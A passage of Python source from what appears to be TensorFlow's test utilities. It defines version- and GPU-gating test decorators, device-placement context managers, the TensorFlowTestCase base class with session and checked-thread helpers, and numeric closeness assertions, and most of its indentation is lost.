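    self.assertEqual([3], x.shape.as_list())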
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Warning: if a non-GPU version of the package is installed, the function would
also return False. Use `tf.test.is_built_with_cuda` to validate if TensorFlow
was built with CUDA support.
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading (since the routine
will return True when a GPU device is available irrespective of whether TF was
built with CUDA support or ROCm support). However, no changes are made here
because:
++ Changing the name "cuda_only" to something more generic would break
backward compatibility
++ Adding an equivalent "rocm_only" would require the implementation check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only"
Returns:
True if a GPU device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
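# Example (illustrative): choosing a device string based on GPU availability.
# The (3, 5) compute-capability threshold is an arbitrary value for the sketch.
def _example_pick_device():
  if is_gpu_available(cuda_only=True, min_cuda_compute_capability=(3, 5)):
    return "/device:GPU:0"
  return "/device:CPU:0"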
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
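# Example (illustrative sketch): combining the context managers above to place
# ops. use_gpu() falls back to the CPU when no GPU is available, while
# force_cpu() always pins to /device:CPU:0.
def _example_device_placement():
  with use_gpu():
    preferred = array_ops.zeros([2])  # GPU if one is available, else CPU
  with force_cpu():
    pinned = array_ops.ones([2])  # always /device:CPU:0
  return preferred, pinned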
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders we should be able to
call self.evaluate(), however this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evalaute `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal of completion.
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def use_deterministic_cudnn(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CUDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = os.environ.get("TF_CUDNN_DETERMINISTIC", "")
os.environ["TF_CUDNN_DETERMINISTIC"] = "true"
result = f(self, *args, **kwargs)
os.environ["TF_CUDNN_DETERMINISTIC"] = original_var
return result
return decorated
if func is not None:
return decorator(func)
return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tensorflow.TF_GetXlaConstantFoldingDisabled()
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# The description is just for documentation purposes.
def disable_xla(description):
def disable_xla_impl(func):
"""Execute the test method only if xla is not enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_xla_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given classes test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
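# Example (illustrative sketch): applying a method-level decorator factory to
# every test method of a class; disable_xla (defined below in this module) is
# used as the factory and the reason string is arbitrary.
@for_all_test_methods(disable_xla, "example: behavior differs under XLA")
class _ExampleAllMethodsTest(googletest.TestCase):

  def test_one(self):
    self.assertEqual(4, 2 * 2)

  def test_two(self):
    self.assertEqual(9, 3 * 3)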
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
def no_xla_auto_jit_impl(func):
"""This test is not intended to be run with XLA auto jit enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Skip test if using XLA is forced.
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return no_xla_auto_jit_impl
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
pywrap_tensorflow.TF_SetXlaAutoJitMode("2")
pywrap_tensorflow.TF_SetXlaMinClusterSize(1)
pywrap_tensorflow.TF_SetXlaEnableLazyCompilation(False)
pywrap_tensorflow.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tensorflow.TF_SetXlaConstantFoldingDisabled(True)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
context.context().summary_writer = None
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each other's environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then uses assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEquals().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
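# Editorial example (not part of the original module): a minimal sketch of the
# intended checkedThread workflow -- create, start, then join before the test
# ends so that exceptions raised inside the thread fail the test. The worker
# function and `compute()` are hypothetical.
#
#   def testWorkerThread(self):
#     results = []
#
#     def worker():
#       results.append(compute())   # assertions made here are also respected
#
#     t = self.checkedThread(target=worker)
#     t.start()
#     t.join()   # re-raised as a test failure if the worker raised
#     self.assertLen(results, 1)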
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
